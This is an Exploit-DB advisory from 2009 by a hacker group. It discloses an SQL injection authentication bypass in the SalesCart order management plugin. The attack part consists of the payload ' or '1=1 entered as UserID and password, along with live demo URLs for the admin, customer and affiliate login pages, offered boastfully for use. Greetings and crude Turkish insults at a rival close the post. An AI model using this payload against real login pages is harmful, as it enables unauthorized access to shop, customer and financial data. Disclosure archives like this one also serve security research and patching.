SalesCart Auth Bypass SQL Injection Vulnerability

2009-01-30T00:00:00
ID EDB-ID:7924
Type exploitdb
Reporter ByALBAYX
Modified 2009-01-30T00:00:00

Description

SalesCart (Auth Bypass) SQL Injection Vulnerability. Webapps exploit for asp platform

                                        
                                            #############################################
#----C4TEAM.ORG---ByALBAYX----C4TEAM.ORG----#
#############################################
[~]Author   : ByALBAYX

[~]Website  : WWW.C4TEAM.ORG
#############################################
[~]Script   :SalesCart Product Management Plugin

[~]Site     :http://www.salescart.com

[~]Demo     :http://www.salescart.com/scorderdemo/online/default.asp

[~]Details  :http://www.salescart.com/demo.htm
#############################################
Order Management Plugin

Create sales reports, invoices, labels, track fulfillment, export data, QuickBooks

[~]Working Demo

[~]http://www.salescart.com/scorderdemo/online/default.asp

[~]UserID   : ' or '1=1


[~]Password : ' or '1=1

[~]http://www.salescart.com/scorderdemo/online/customer/customer_login.asp

[~]Ship-to Email Address : xxx@c4team.org


[~]Password : ' or '1=1


[~]http://www.salescart.com/scorderdemo/online/affiliate/affiliate_login.asp

#############################################

[~]http://www.c4team.org/ [PATH] /default.asp


[~]UserID   : ' or '1=1


[~]Password : ' or '1=1


[~]vs... :D

#############################################
[~]iSiNiZE BAqIN :=)

[~]Greetz For C4TEAM Members
#############################################
[~]Uzun Yillardir Bu Iskorpitx Nefretini Anlayamadim Gitti....

[~]Gotlerinin Bokuyla isko'ya Rajon Kesiyo ibneler :D :D
#############################################
Derdimi dinledim, derdimden iGRENDiM...
Onun derdini gordum, derdime iMRENDiM...
FilistiN
----------

# milw0rm.com [2009-01-30]